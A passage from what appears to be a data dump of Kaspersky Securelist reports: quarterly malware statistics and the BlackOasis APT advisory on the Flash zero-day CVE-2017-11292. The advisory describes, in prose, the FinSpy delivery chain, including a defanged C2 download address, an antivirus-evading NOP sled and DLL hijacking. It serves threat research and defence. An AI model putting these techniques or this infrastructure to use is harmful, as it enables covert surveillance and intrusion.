10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks **included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "modified": "2017-11-10T10:45:04", "published": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:</p style=\"margin-bottom:0!important\">\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-15T21:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 